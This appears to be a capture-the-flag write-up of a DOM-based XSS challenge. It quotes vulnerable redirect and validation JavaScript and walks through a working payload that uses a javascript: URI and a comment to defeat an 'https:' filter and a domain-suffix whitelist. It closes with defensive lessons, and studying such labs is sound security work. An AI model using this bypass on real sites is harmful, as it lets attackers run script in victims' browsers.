Overview
A classic DOM-based XSS challenge involving poor URL validation logic and parameter filtering. This write-up walks through the vulnerable JavaScript code and how to exploit it.
Step-by-Step Analysis
Step 1: Parameter Parsing Function (Lines 84–91)
JavaScript:
var p = function () {
const s = new URLSearchParams(location.search);
const p = {};
s.forEach((v, k) => {
v.indexOf("https:") > -1 ? (p[k] = v) : void 0;
});
return p;
};

- Parses query parameters from the URL
- Filters and keeps only parameters that contain `"https:"`
- Returns a filtered object of parameters
---
Step 2: Domain Whitelists (Lines 94–97)
JavaScript:
s = { "debug.spix0r.online": ["debug_mode"] },
c = [".spix0r-lab.online", ".spix0r.academy", ".spix0r.team"];

- `s`: Object mapping hostnames to allowed parameters
- `c`: Array of allowed domain suffixes used in validation
---
Step 3: URL Validation Function (Lines 98–106)
JavaScript:
var u = function (e) {
var t;
if (!e) return !1;
var n = /^https?:\/\//i.test(e) ? new URL(e).host : e;
return (
null !== (t = s[window.location.hostname]) && void 0 !== t ? t : c
).some(function (e) {
return n.endsWith(e);
});
};

- The key line is:
```javascript
var n = /^https?:\/\//i.test(e) ? new URL(e).host : e;
If the input does NOT start with http(s)://, it skips proper URL parsing.
This allows bypass using a javascript: scheme.
Step 4: Execution Point (Line 107)
JavaScript:
u(p().l) ? (location.href = p().l) : false;

Extracts l parameter from the parsed object
Validates it using function u()
If valid, redirects the user to the given URL
Otherwise, nothing happens
Exploitation Walkthrough
[]Step 1: Bypass Parameter Filter — Use a value that contains "https:"
[]Step 2: Bypass URL Validation — Use a javascript: URI scheme
Step 3: Bypass Domain Check — Append whitelisted domain as a comment
Final Payload:
Code:
/?l=javascript:alert(origin);//https:.spix0r.team

javascript:alert(origin); — Malicious code
// — JavaScript comment (rest is ignored)
https:.spix0r.team — Satisfies the https: check and ends with .spix0r.team

Learnings
Never trust client-side filters to sanitize URLs
Always parse and validate full URLs using a trusted library
Avoid executing untrusted data directly in redirections
